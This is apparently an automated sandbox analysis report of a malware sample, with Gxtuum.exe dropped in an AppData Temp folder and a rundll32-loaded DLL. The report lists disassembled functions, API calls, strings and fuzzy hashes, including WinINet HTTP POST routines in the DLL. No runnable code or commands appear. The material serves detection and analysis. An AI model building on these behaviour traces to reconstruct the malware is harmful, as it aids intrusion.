Instruction Fuzzy Hash: 39F0AC3A504165BBCF221F95EC08A9B3F66EB1A3A5B144014FE1DD5570D73298A0DB91

Function 00109F5A Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32(?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F7D
LeaveCriticalSection.KERNEL32(00148FA8,000E2E1C,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F87
WaitForSingleObjectEx.KERNEL32(000E2E1C,00000000,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F98
EnterCriticalSection.KERNEL32(00148FA8,?,00109EF7,00000064,?,?,?,000E2E1C,0014CDC4), ref: 00109F9F

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
Instruction ID: 7fc890cc1a2e8175487242a3c7a38a916c6e1a7ccb1699aa892ba709e2b7949e
Opcode Fuzzy Hash: 5eeb76bb1aaf168e6b25980f01496b07792166d1f5ffa4e0deb9d10beeb40fff
Instruction Fuzzy Hash: 2AE04F36A45125BBCB012F50EC09ACEBF2AFF59B72B104111FA09A69B0CFB119959BD4

Function 00114AF9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00114B02

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 00114B15
_free.LIBCMT ref: 00114B26
_free.LIBCMT ref: 00114B37

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
Instruction ID: 73a21dbac150b872c4e8a393ee24ea20b7118106b4e4c68bc573bdbb81c4db73
Opcode Fuzzy Hash: 2d4fd8c805d5b0f39cbd8bbee5fe3c61806142e86c0ef76162163cb0957bedf2
Instruction Fuzzy Hash: 8DE0E6BD8112209ECB556F15FC418C7BE62F79A754342801EF41C22A31DB3945D29F95

Function 0011385D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001138ED

Strings

pow, xrefs: 001138C5, 001138E2

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
Instruction ID: fa417983987e14404107ffa1355b92535a7fd53028fb9cf4e7c0fa69bab56c22
Opcode Fuzzy Hash: 72830601d4d190bcd7499e48e000b5b7b398fe225b2d9e754e905b4aa40778ce
Instruction Fuzzy Hash: A751CD61A0820596CB1D7794C9113FE6BE5EB60B58F208E79F8E1422ACFF348DD4DB42

Function 00113F62 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 00113FA5, 00113FAC, 00113FE2

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
API String ID: 0-1719652438
Opcode ID: 91ca972826d96004eaf8fcf35e1fe8b78d1c74136d1229b09845503791939992
Instruction ID: 2cee17ab87825b8060a7fe6356f4d1e9660e4418fdfc30c2bac0dfd742a692ca
Opcode Fuzzy Hash: 91ca972826d96004eaf8fcf35e1fe8b78d1c74136d1229b09845503791939992
Instruction Fuzzy Hash: 5E41A071E00215AFDB299F9ADC819DFBBB8EF99710B11007AF508D7251E7718AC1CB51

Function 0010D4BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0010D4E1

Strings

MOC, xrefs: 0010D4F3
RCC, xrefs: 0010D4FB

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
Instruction ID: 1886c81d0d480946ecc023a2ab4ac0665e698a96b821414bee634b58825ecf7b
Opcode Fuzzy Hash: 4b28fcaf82ee544a3e9bf7ed0bf9cfe9389f840d056e9eb56c40efaf918eedcc
Instruction Fuzzy Hash: 3A419C71900209AFCF16DF98DC81AEEBBB5FF08304F188059F945A7291D3B59A51CF51

Function 0010820A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00108292
RaiseException.KERNEL32(?,?,?,?), ref: 001082B7

Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00143A84,?,?,?,00143A84), ref: 0010B4A6

Part of subcall function 0010E364: IsProcessorFeaturePresent.KERNEL32(00000017,0011727C,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 0010E380

Strings

csm, xrefs: 00108246

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: e188388184496159f01096f36a154a95e76e8ec41634093d4a173d71c5ad5197
Instruction ID: 9018f12bb283a3dfd26e9a63ac3b6ebbee8b3e59bb79ea6a2c714143c146c108
Opcode Fuzzy Hash: e188388184496159f01096f36a154a95e76e8ec41634093d4a173d71c5ad5197
Instruction Fuzzy Hash: 0421A932D0061CABCF34DFE5C885AAEB7B9BF55710F554409E8C5AB294CBB0AD45CB81

Function 000E44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000E44EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000E453A

Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D5D
Part of subcall function 00108D3E: _Yarn.LIBCPMT ref: 00108D81

Strings

bad locale name, xrefs: 000E4556

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 4edd91d1f9ec5f8909c0255504446de2d0d81795ed651e2563330c4c5d71fd1f
Instruction ID: 08ed8cd8c2d6ee9475fad4bb9ff19b353030f07b0f6207117633d18b076d5d9c
Opcode Fuzzy Hash: 4edd91d1f9ec5f8909c0255504446de2d0d81795ed651e2563330c4c5d71fd1f
Instruction Fuzzy Hash: 0411A071904B849FD320CF69C901747BBE8EF29710F008A1EE499D7B81E7B5A504CB95

Analysis Process: powershell.exePID: 6944, Parent PID: 1220COMMON

Executed Functions

Function 00007FFD9B6EC725 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

X7Q, xrefs: 00007FFD9B6EC91D

Memory Dump Source

Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd

Similarity

API ID:
String ID: X7Q
API String ID: 0-1167904179
Opcode ID: 27fad6f75686837839879f31da283f28bea495a2c8503f1eaa1a81a71da35f29
Instruction ID: c291e4fa4c780e89e4db9027b7dc5f955e5b79ca713412af6f442ca5c4f4de21
Opcode Fuzzy Hash: 27fad6f75686837839879f31da283f28bea495a2c8503f1eaa1a81a71da35f29
Instruction Fuzzy Hash: 63D13732A0FA8D1FE7A5DBA848659B57FE1EF56350B0900FBD06DCB0E3DA18A915C341

Function 00007FFD9B6E55CD Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77d35e95e0a1ccba758d987b3a0c29d57609cd8ff3c78a310ff6f6be421a9a5
Instruction ID: 588b7a83d8c484ca30d12d269e892163cce326c964ee46ac622ce806c580d8d2
Opcode Fuzzy Hash: b77d35e95e0a1ccba758d987b3a0c29d57609cd8ff3c78a310ff6f6be421a9a5
Instruction Fuzzy Hash: F371E812A1F7DA0FE766977858654A43FA1EF53250B0A01FBC0A8CF0F3EA186D598352

Function 00007FFD9B6E572D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f679e8013e815fff790f07041d5babd016240c29f501b5625ca11eeb32e826
Instruction ID: e8c4baa36b0b9299ace3c09fff1fd41996439a53381716b656bd5f717f25617e
Opcode Fuzzy Hash: 25f679e8013e815fff790f07041d5babd016240c29f501b5625ca11eeb32e826
Instruction Fuzzy Hash: 0A21BF6290FBD54FEB229B7888354953FA0AF1362070A02EBC0F9CF1F3D9186956C761

Function 00007FFD9B6133B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2088878134.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b610000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 1c39ba780929a99a3a3d0671f27ed59f4783623c8193afbc92b78954e5770218
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: BC01A73020CB0C4FDB48EF0CE051AA5B3E0FB85320F10056EE59AC36A1DA32E882CB45

Analysis Process: rundll32.exePID: 6828, Parent PID: 6968COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	539
Total number of Limit Nodes:	4

Executed Functions

Function 6C0531B0 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

abcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6C05357D
NKx, xrefs: 6C05377C, 6C05384D, 6C05388E, 6C053A89
$NKx, xrefs: 6C053993, 6C0539B8, 6C0539A4
wlt=1, xrefs: 6C053ADA
+++, xrefs: 6C053B4B
NKxo, xrefs: 6C0531C4, 6C053427, 6C053554, 6C053774, 6C053886, 6C053AB4

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID:
String ID: $NKx$+++$NKx$NKxo$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
API String ID: 0-627200555
Opcode ID: 86470fe5233d6829d1f42bec856c0fb489e7ea6203af2649c727a4ea00ae3673
Instruction ID: 5918cc9c34f4a6db0f56ea423f9d0e20f41f18a49038f98909d497d0d9799260
Opcode Fuzzy Hash: 86470fe5233d6829d1f42bec856c0fb489e7ea6203af2649c727a4ea00ae3673
Instruction Fuzzy Hash: D4F109B1A00208AFEB04CF69CD44BAEBBF5FB49714F90461DF414A7BC0DB75A9548B91

Function 6C051EC0 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 409
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C051EC5

Part of subcall function 6C056751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C05675D

InternetOpenW.WININET(6C06BA54,00000000,00000000,00000000,00000000), ref: 6C051FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6C051FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6C051FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6C052031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6C05204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6C05224B
InternetCloseHandle.WININET(00000000), ref: 6C052266
InternetCloseHandle.WININET(?), ref: 6C05226E
InternetCloseHandle.WININET(?), ref: 6C052276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6C051F71
POST, xrefs: 6C051FF2
NKx, xrefs: 6C0525E7
NKx, xrefs: 6C051EF2
NKx], xrefs: 6C05280A
string too long, xrefs: 6C051EC0
NKxo, xrefs: 6C051EE7

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: Content-Type: application/x-www-form-urlencoded$NKx$NKx$NKx]$NKxo$POST$string too long
API String ID: 4066372336-2944832111
Opcode ID: de376a9af6c3a9a3193f136fd46471f98228fb2d0cd3e27c86ae497cf7f0f9d4
Instruction ID: 0c5ba7903e2523954a71d7060e3ae2962fcfb011e3d64bad6450a38456b4dfe7
Opcode Fuzzy Hash: de376a9af6c3a9a3193f136fd46471f98228fb2d0cd3e27c86ae497cf7f0f9d4
Instruction Fuzzy Hash: F2F1A2B06011189FEB24CF28CD88BDDBBF5AF45308F9441D8E608AB681DB75AAD4CF55

Function 6C051ED0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 386
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(6C06BA54,00000000,00000000,00000000,00000000), ref: 6C051FA7
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6C051FCE
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6C051FF8
HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6C052031
InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6C05204B
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6C05224B
InternetCloseHandle.WININET(00000000), ref: 6C052266
InternetCloseHandle.WININET(?), ref: 6C05226E
InternetCloseHandle.WININET(?), ref: 6C052276

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 6C051F71
POST, xrefs: 6C051FF2
NKx, xrefs: 6C051EF2
NKxo, xrefs: 6C051EE7

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: Content-Type: application/x-www-form-urlencoded$NKx$NKxo$POST
API String ID: 1354133546-2469140843
Opcode ID: 7b02f5193ea09553609f47ce51360eab0e559fe0a803e1ecd5b1a1ce988de2ac
Instruction ID: 9504de824c45ea58b172f0bb91a96e0ec10b04818853f6e3e846457ae4a715a3
Opcode Fuzzy Hash: 7b02f5193ea09553609f47ce51360eab0e559fe0a803e1ecd5b1a1ce988de2ac
Instruction Fuzzy Hash: B9F1A2B0A011189FEB24CF28CD88BDDBBF5AF45304F944198E608AB6C1DB75AAD4CF55

Function 6C056E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6C056EC1
___scrt_uninitialize_crt.LIBCMT ref: 6C056EDB

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 23f669a8a076896e9ac47b9d01d916c440212625bfc03f404a838a0c3274df04
Instruction ID: 1886597aac1611364e8a0190cdfb4fa32acb61af859ce2e58dc6e6c5e0b067dd
Opcode Fuzzy Hash: 23f669a8a076896e9ac47b9d01d916c440212625bfc03f404a838a0c3274df04
Instruction Fuzzy Hash: 83410B72E15228EFDF208F59CE40BAE7AF5EF40759F908515E814A7B40CB315D25DB90

Function 6C056F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6C056F69
dllmain_crt_dispatch.LIBCMT ref: 6C056F80
dllmain_raw.LIBCMT ref: 6C056FC8
dllmain_crt_dispatch.LIBCMT ref: 6C056FDB
dllmain_raw.LIBCMT ref: 6C056FEE

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 9f0005ce9d7f75d20c26c20e31a01fb16435976599f5c61cefed700a559a445b
Instruction ID: edc391d79f25a17322e283844189de16f9b9a495dbdd6665fe18df782d6396a2
Opcode Fuzzy Hash: 9f0005ce9d7f75d20c26c20e31a01fb16435976599f5c61cefed700a559a445b
Instruction Fuzzy Hash: B4219171D11228EFDB218F19CE40BAF3AF9EB84798B918515F81497B10C7319D61EBE0

Function 6C05B423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B428
_free.LIBCMT ref: 6C05B485
_free.LIBCMT ref: 6C05B4BB
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B4C6

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d7a397feaf920a2d9584f3745466e5ecc2f2b5e8b94d4f33879696bc60bc583b
Instruction ID: e18a1c11a01441f8256de8346037dce3f0ac9081738f711ac72c8adcdbe4a5eb
Opcode Fuzzy Hash: d7a397feaf920a2d9584f3745466e5ecc2f2b5e8b94d4f33879696bc60bc583b
Instruction Fuzzy Hash: 7C11E971705704ABEA201E7A4F84F6B25E9ABC277CBA40625F634D3AC1EF31BC354561

Function 6C05B8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C05B46E,00000001,00000364,00000006,000000FF,?,00000001,6C05B68B,6C05B935,?,?,6C05AB0E), ref: 6C05B8F3

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 83048dc6929446bc17db5c579a27d8166bf9fd4762d1efc2ff38990517ec95fb
Instruction ID: e835dc37168b87a9e30379b721ee82f9823aa3f06dee116fdcfa3604007cccac
Opcode Fuzzy Hash: 83048dc6929446bc17db5c579a27d8166bf9fd4762d1efc2ff38990517ec95fb
Instruction Fuzzy Hash: 61F0B431206A2867EB115E678F04B7B37DCAF427A4B955161E8149B980CF30F420C6E0

Non-executed Functions

Function 6C05BD9F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 194
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6C05BE8F
_free.LIBCMT ref: 6C05BF5F
FindNextFileW.KERNEL32(00000000,?), ref: 6C05BF6D
_free.LIBCMT ref: 6C05BFBB
FindClose.KERNEL32(00000000), ref: 6C05BFCA
_free.LIBCMT ref: 6C05BFE0

Strings

NKxo, xrefs: 6C05BDAA

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: Find_free$File$CloseFirstNext
String ID: NKxo
API String ID: 1576393127-1440849049
Opcode ID: f2c12f49fb29a569ff18aca5e70d8c75ca036acde406f752c81c356fd297c989
Instruction ID: d852a7a395c074553ea8fcb5b7170f86b2e13ac5f977f9aeb91de6c559d4cee7
